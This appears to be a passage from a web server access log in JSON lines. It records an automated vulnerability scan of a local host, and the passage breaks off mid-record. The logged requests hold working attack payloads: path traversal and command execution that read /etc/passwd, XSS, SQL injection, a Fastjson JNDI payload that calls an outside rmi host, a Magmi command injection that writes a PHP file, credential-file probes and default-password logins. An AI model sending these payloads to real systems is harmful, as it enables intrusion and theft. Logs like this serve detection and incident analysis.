AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.579","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.892","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.540","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /filezilla.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.543","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.456","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.593","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.565","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.407","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.495","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.453","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.505","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.462","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.561","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.521","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sitemanager.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.481","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.445","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.479","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9oms3gsmpve1ijt0mc05wfeir79asm7r.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /view/viewer_index.shtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.104","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.315","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.966","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.455","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.260","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adminlogin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.084","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:28 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.015","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": 